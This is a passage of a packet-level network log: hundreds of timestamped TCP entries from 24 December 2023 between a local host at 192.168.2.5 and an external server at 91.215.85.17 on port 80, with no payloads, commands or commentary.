Dec 24, 2023 10:44:28.456243992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456284046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456322908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.456343889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456404924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456444025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456445932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.456490993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456526995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.456563950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456604004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456643105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.456671953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456693888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456738949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.456763983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456821918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456860065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.456878901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456943035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456970930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.456983089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457057953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457102060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457148075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457161903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457194090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457254887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457313061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457355976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457380056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457427025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457463980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457484007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457525015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457566023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457587957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457638025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457675934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457679987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457729101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457770109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457787991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457838058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457876921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.457901001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.457968950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458009005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.458020926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458045959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458084106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.458194971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458302021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458342075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.458399057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458499908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458544016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458547115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.458630085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458673954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458676100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.458772898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458812952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.458856106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458914042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.458956003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.458956003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459043026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459079981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.459093094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459137917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459178925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.459197998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459244967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459285975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.459309101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459358931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459395885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.459424019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459573984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459613085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.459619045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459701061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459758043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.459902048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459933043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.459974051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.460006952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460058928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460099936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.460180998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460249901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460292101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.460316896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460364103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460407019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.460418940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460469007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460506916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.460544109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460586071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460633993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.460633993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460692883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460743904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460747957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.460827112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.460865021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.460937977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461014032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461050987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461061954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461091995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461128950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461165905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461213112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461261034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461285114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461349964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461390972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461409092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461452007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461491108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461515903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461566925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461621046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461632967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461704969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461743116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461762905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461834908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461874962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461875916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461929083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.461967945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.461992025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462035894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462069035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.462095976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462147951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462188005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.462202072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462294102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462330103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.462368965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462529898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462568045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.462608099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462671041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462685108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462711096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.462780952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462796926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462821007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.462848902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.462883949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.462944031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463022947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463062048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.463073969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463123083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463160038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.463184118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463234901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463269949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.463475943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463541985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463574886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.463598013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463645935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463676929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.463685989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463749886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463790894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.463833094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463912010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.463944912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.463973045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464039087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464072943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464088917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464138985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464174032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464190006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464273930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464312077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464334011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464397907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464438915 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464462042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464509010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464543104 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464560032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464597940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464634895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464662075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464708090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464730024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464740992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464812040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464847088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464860916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464896917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.464934111 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.464996099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465050936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465085983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.465094090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465140104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465176105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.465189934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465270996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465312958 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.465630054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465679884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465718985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.465748072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465796947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465830088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.465892076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465939999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.465975046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.466000080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466062069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466097116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.466135979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466217995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466255903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.466275930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466348886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466392994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.466396093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466442108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466475010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.466504097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466561079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466598034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.466618061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466667891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466710091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.466737032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466823101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466866016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.466895103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466942072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.466979027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.467017889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467113972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467149973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.467174053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467233896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467268944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.467272997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467324018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467359066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.467372894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467426062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467463017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.467473984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467529058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467560053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.467588902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467641115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467724085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.467737913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467797995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.467838049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.467880011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468017101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468056917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468066931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468130112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468194008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468220949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468242884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468277931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468281984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468381882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468395948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468420982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468460083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468497038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468534946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468560934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468596935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468627930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468679905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468717098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468735933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468786001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468820095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468822002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468864918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468910933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.468914032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.468998909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469034910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.469057083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469083071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469120026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.469206095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469314098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469352007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.469374895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469389915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469427109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.469546080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469604969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469639063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.469674110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469719887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469754934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.469888926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469902992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469917059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469938040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.469965935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.469999075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.470017910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470062971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470101118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.470110893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470180035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470216036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.470288038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470386028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470422983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.470442057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470504045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470540047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.470592022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470626116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470665932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.470695972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470721006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470756054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.470863104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470918894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.470956087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.470963955 CET	80	49716	91.215.85.17	192.168.2.5
